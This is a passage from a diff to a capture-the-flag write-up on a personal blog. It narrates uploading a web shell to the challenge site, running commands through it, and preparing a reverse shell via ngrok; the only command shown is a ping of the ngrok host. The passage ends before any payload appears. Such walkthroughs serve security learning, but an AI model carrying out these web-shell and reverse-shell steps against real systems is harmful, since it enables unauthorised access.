n16hth4wk07/n16hth4wk07.github.io/posts/CTF/abcctf.md

 ```

+we did that now let's check back the webpage to see our shell

 ![image](https://user-images.githubusercontent.com/87468669/194126637-3fd3164f-2b79-4724-9a26-c1839c539120.png)

+great we can execute some commands on the shell we uploaded

 ![image](https://user-images.githubusercontent.com/87468669/194126743-bb62ec9f-8cff-43c3-a430-d396f391a395.png)

+Now let get a reverse shell using ngrok.

 ![image](https://user-images.githubusercontent.com/87468669/194126878-06588b8b-f61b-4b65-8f38-3e4a0aa10846.png)

-now let's ping our ngrok.io to get an ip address
+ping our ngrok.io to get an ip address
 ```
 ┌──(n16hth4wk㉿n16hthawk-sec)-[~/abcctf/method]
 └─$ ping -c 2 2.tcp.eu.ngrok.io